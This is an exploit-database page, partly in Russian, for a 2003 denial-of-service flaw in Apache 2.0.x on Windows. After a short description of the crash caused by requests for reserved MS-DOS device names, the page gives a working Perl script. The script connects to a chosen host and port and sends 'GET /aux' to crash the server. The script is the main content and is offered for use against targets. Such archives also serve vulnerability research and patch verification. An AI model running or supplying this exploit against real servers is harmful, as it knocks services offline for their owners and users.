Exploit Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service

[Exploiter]

EDB-ID

22191

Проверка EDB

1. Пройдено

Автор

MATTHEW MURPHY

Тип уязвимости

DOS

Платформа

LINUX

CVE

N/A

Дата публикации

2003-01-22

source: https://www.securityfocus.com/bid/6662/info

A vulnerability has been reported in Apache Web server for Microsoft Windows. The vulnerability exists in the way some HTTP requests are handled by the Apache Web server. Specifically, HTTP GET requests that involve reserved MS-DOS device names may cause the Apache Web server to crash.

#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1 || @ARGV > 2) {
	print STDOUT "Usage: perl $0 <host> <port=80>";
	exit;
}
if (@ARGV == 2) {
	$port = $ARGV[1];
} else {
	$port = 80;
}
$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0], 
PeerPort=>$port);
print $f "GET /aux HTTP/1.0\r\n\r\n";